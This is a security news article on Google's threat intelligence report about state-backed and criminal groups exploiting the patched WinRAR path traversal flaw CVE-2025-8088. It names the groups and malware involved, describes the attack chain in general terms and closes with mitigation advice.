Google Threat Intelligence Group reveals nation-state and financially motivated actors are actively exploiting a now-patched WinRAR vulnerability to establish persistence and deploy diverse malware payloads.
Google has issued a stark warning about the widespread exploitation of a critical WinRAR vulnerability, CVE-2025-8088, which continues to be weaponized by both nation-state adversaries and financially motivated cybercriminals months after its discovery and patch release.
Critical Vulnerability Remains a Persistent Threat
The vulnerability, discovered by ESET and patched in WinRAR version 7.13 on July 30, 2025, carries a CVSS score of 8.8 and allows attackers to achieve arbitrary code execution through malicious archive files. Despite the patch being available for months, Google Threat Intelligence Group (GTIG) reports that multiple threat actors continue exploiting this "n-day" vulnerability across diverse operations.
"Discovered and patched in July 2025, government-backed threat actors linked to Russia and China as well as financially motivated threat actors continue to exploit this n-day across disparate operations," GTIG stated in their analysis. "The consistent exploitation method, a path traversal flaw allowing files to be dropped into the Windows Startup folder for persistence, underscores a defensive gap in fundamental application security and user awareness."
Exploitation Methods and Attack Chains
Attackers are leveraging the vulnerability to establish persistence by exploiting a path traversal flaw that allows malicious files to be dropped into the Windows Startup folder. The attack chains typically involve:
- Concealing malicious files (such as Windows shortcuts or LNK files) within alternate data streams (ADS) of decoy files inside the archive
- Extracting payloads to specific paths, particularly the Windows Startup folder
- Automatic execution upon user login after system restart
The initial discovery revealed that the dual financial and espionage-motivated threat group RomCom (also known as CIGAR or UNC4895) exploited the flaw as a zero-day as early as July 18, 2025, delivering a variant of the SnipBot malware, also referred to as NESTPACKER.
Nation-State Actors Weaponizing the Flaw
Google has identified several Russian threat actors actively exploiting CVE-2025-8088:
Sandworm (APT44/FROZENBARENTS): Leveraging the flaw to drop decoy files with Ukrainian filenames and malicious LNK files that attempt further downloads.
Gamaredon (CARPATHIAN): Using the vulnerability to target Ukrainian government agencies with malicious RAR archives containing HTML Application (HTA) files that act as downloaders for second-stage payloads.
Turla (SUMMIT): Delivering the STOCKSTAY malware suite using lures centered around Ukrainian military activities and drone operations.
Additionally, a China-based actor has been identified weaponizing the same vulnerability to deliver Poison Ivy malware via batch scripts dropped into the Windows Startup folder, configured to download additional droppers.
Financially Motivated Cybercrime Operations
Beyond nation-state actors, financially motivated threat actors have quickly adopted the vulnerability to deploy commodity remote access trojans (RATs) and information stealers against commercial targets. These campaigns have resulted in:
- Deployment of Telegram bot-controlled backdoors
- Distribution of malware families like AsyncRAT and XWorm
- A cybercrime group targeting Brazilian users via banking websites
- Delivery of malicious Chrome extensions capable of injecting JavaScript into Brazilian banking sites to serve phishing content and steal credentials
Thriving Underground Economy for Exploits
The widespread exploitation of CVE-2025-8088 is partly attributed to a thriving underground economy where WinRAR exploits have been advertised for thousands of dollars. Google identified a supplier known as "zeroplayer" who marketed a WinRAR exploit in the weeks leading up to the public disclosure of the vulnerability.
"Zeroplayer's continued activity as an upstream supplier of exploits highlights the continued commoditization of the attack lifecycle," GTIG noted. "By providing ready-to-use capabilities, actors such as zeroplayer reduce the technical complexity and resource demands for threat actors, allowing groups with diverse motivations [...] to leverage a diverse set of capabilities."
Broader Context: Multiple WinRAR Vulnerabilities Under Attack
The exploitation of CVE-2025-8088 is particularly concerning given that another WinRAR vulnerability, CVE-2025-6218 (CVSS score: 7.8), has also witnessed exploitation efforts from multiple threat actors including GOFFEE, Bitter, and Gamaredon. This pattern underscores the persistent threat posed by N-day vulnerabilities in widely used software.
Protection and Mitigation
Organizations and individuals are strongly advised to:
- Update WinRAR to version 7.13 or later immediately
- Implement application whitelisting to prevent unauthorized programs from running
- Monitor for suspicious files in the Windows Startup folder
- Educate users about the risks of opening archive files from untrusted sources
- Deploy endpoint detection and response (EDR) solutions capable of identifying exploitation attempts
The continued exploitation of a patched vulnerability months after its disclosure highlights the critical importance of timely software updates and the persistent threat landscape facing organizations worldwide. As threat actors continue to commoditize exploits and share capabilities, the window between patch release and widespread exploitation continues to shrink, making proactive security measures more essential than ever.
Comments
Please log in or register to join the discussion